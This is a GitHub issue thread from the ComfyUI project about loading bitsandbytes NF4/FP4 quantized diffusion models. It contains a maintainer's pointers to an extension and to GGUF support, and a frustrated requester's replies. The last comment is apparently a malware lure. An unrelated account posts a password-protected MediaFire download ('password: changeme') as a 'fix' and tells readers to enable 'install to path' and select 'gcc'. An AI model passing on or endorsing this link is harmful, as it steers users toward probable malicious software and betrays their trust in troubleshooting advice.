### ISSUE TITLE
diffusion models bnb-nf4*bnb-fp4 support 

### ISSUE THREAD

**Issue by al-swaiti** [comfyanonymous/ComfyUI#4633]
### Feature Idea

i tried to load nf4 (model only) using checkpoint loader & diffusion model loader ..... not work ,

**Comment by mcmonkey4eva** [comment]
There's an extension for this https://github.com/comfyanonymous/ComfyUI_bitsandbytes_NF4

but you should probably just use gguf files instead of bnb, they're better supported via https://github.com/city96/ComfyUI-GGUF

**Comment by mcmonkey4eva** [comment]
that'd be an issue related to the extension, not comfy's core. There's a PR about it https://github.com/comfyanonymous/ComfyUI_bitsandbytes_NF4/pull/39

but, again, you should probably just use gguf files instead of bnb, they're better supported via https://github.com/city96/ComfyUI-GGUF

**Comment by al-swaiti** [comment]
im already do quantization in both for all kinds of AI model the two method in parallel , and both must be supported,  whatever , some users now tried to install another services because the nf4 more faster , its not for me !!!!!!!!!!!!!!!!!!! i already made node for that ! but beacuse its not my issue its an issue of many contact me to show them how to load models
 an ex :https://civitai.com/models/682369
comfyui not a small project ,,, and you have to action here carefully ,,, why you closed the features as spam ! i didnt saw you before ,, i saw your project and i will keep my words about it .

**Comment by al-swaiti** [comment]
temporary i  bypassed  the issue by make full checkpoint to facilitate using of comfyui for users https://civitai.com/models/692569/newton

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
